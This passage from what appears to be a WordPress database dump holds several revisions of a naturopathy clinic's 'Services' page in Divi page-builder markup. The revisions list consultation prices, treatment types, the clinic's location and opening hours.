custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" min_height=\"425px\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Stress strategies</span><br /><span style=\"font-family: Montserrat;\">Exercise and movement</span><br /><span style=\"font-family: Montserrat;\">Mindfulness </span><br /><span style=\"font-family: Montserrat;\">Sleep hygiene</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" parallax=\"on\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 11am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Services','','inherit','closed','closed','','424-revision-v1','','','2025-10-02 10:49:22','2025-10-02 02:49:22','',424,'https://verdenaturopathy.com.au/?p=488',0,'revision','',0),(482,1,'2025-09-16 18:06:02','2025-09-16 10:06:02','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" custom_padding=\"||0px|||\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Naturopathic consults</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial (60 min) - $190\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span>\n\n<span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span>\n\n<span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $95\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" width=\"100%\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" min_height=\"425px\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Stress strategies</span><br /><span style=\"font-family: Montserrat;\">Exercise and movement</span><br /><span style=\"font-family: Montserrat;\">Mindfulness </span><br /><span style=\"font-family: Montserrat;\">Sleep hygiene</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" parallax=\"on\" custom_padding=\"7px|||||\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span>\n<span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span>\n<span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Services','','inherit','closed','closed','','424-revision-v1','','','2025-09-16 18:06:02','2025-09-16 10:06:02','',424,'https://verdenaturopathy.com.au/?p=482',0,'revision','',0),(433,1,'2025-04-01 20:05:15','2025-04-01 12:05:15','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial (60 min) - $185\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span>\n\n<span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span>\n\n<span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span>\n\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $90\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" 